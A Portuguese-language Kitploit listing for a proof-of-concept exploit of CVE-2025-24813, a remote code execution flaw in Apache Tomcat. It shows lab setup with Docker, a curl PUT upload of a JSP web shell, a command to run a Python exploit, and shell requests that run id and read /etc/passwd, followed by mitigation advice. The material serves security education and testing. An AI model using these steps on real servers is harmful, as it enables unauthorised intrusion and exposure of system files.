Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24813 — Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC | Kitploit
Ferramentas/GitHubGitHub/shivshantp/cve-2025-24813
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed TeamingDesenvolvimento de PayloadsLabs e Prática
GitHubshivshantp/cve-2025-24813

CVE-2025-24813

Apache Tomcat PUT JSP RCE - CVE-2025-24813 - Exploit & PoC

Ver Repositório
5há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2025-24813 – Apache Tomcat PUT JSP RCE Exploit

CVE Exploit-Status Platform Language Dockerized License

Este repositório contém uma prova de conceito (PoC) completa para a CVE-2025-24813, uma vulnerabilidade de Execução Remota de Código (RCE) no Apache Tomcat que utiliza o método HTTP PUT para implantar um web shell malicioso em JSP.

🔥 Este exploit demonstra como um atacante pode obter RCE por meio de upload de arquivos e execução de payloads em instâncias do Tomcat configuradas de forma insegura.


📁 Estrutura do Projeto

root@kitploit:~
CVE-2025-24813/
├── docker/                         
│   ├── Dockerfile
│   └── web.xml                    
├── exploit/                        
│   ├── 1_exploit_cve_2025_24813.py
│   └── shell.jsp
├── screenshots/                    
│   ├── 1_tomcat_running.png
│   ├── 2_docker_started.png
│   ├── 3_upload_shell.png
│   ├── 4_run_python_exploit.png
│   ├── 5_access_shell_whoami.png
│   ├── 6_view_etc_passwd.png
│   ├── 7_run_uname.png
│   ├── 8_run_id.png
│   └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md

🚀 Passos da Exploração

1️⃣ Configurar o Ambiente Docker

root@kitploit:~
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat

📸 Tomcat em Execução
📸 Docker Iniciado


2️⃣ Enviar o Web Shell JSP Malicioso

root@kitploit:~
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp

📸 Upload do JSP


3️⃣ Executar o Exploit em Python

root@kitploit:~
python3 exploit/1_exploit_cve_2025_24813.py

📸 Executar Exploit


4️⃣ Interagir com o Web Shell

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd

📸 whoami
📸 passwd
📸 uname
📸 id
📸 pwd


🧩 Recursos

  • 🔧 Configuração baseada em Docker de um servidor Apache Tomcat vulnerável
  • 📥 Abuso do método PUT para enviar e acionar web shells JSP
  • 🐍 Script PoC baseado em Python
  • 📸 Tutorial completo com capturas de tela
  • 📚 Ideal para simulação de red team e educação

🛠️ Como Corrigir (Mitigação)

  • 🚫 Desative os métodos PUT/DELETE no web.xml ou na configuração do servidor
  • ⛓️ Utilize um security manager ou controles mais rígidos do contêiner de servlets
  • 🔐 Aplique filtros de upload e validação em nível de arquivo
  • 🧱 Configure um WAF para bloquear requisições PUT não autorizadas
  • ✅ Atualize para uma versão segura e corrigida do Apache Tomcat

⚠️ Aviso Legal

Este projeto é apenas para fins educacionais e de pesquisa. Testar, explorar ou usar sistemas que você não possui ou sem autorização é ilegal e antiético.


👨‍💻 Autor

Shivshant Patil
Ethical Hacker Certificado (CEH v13)
Graduado em Engenharia da Computação (B.Tech)
🔗 LinkedIn
🔗 GitHub


Baixar ferramenta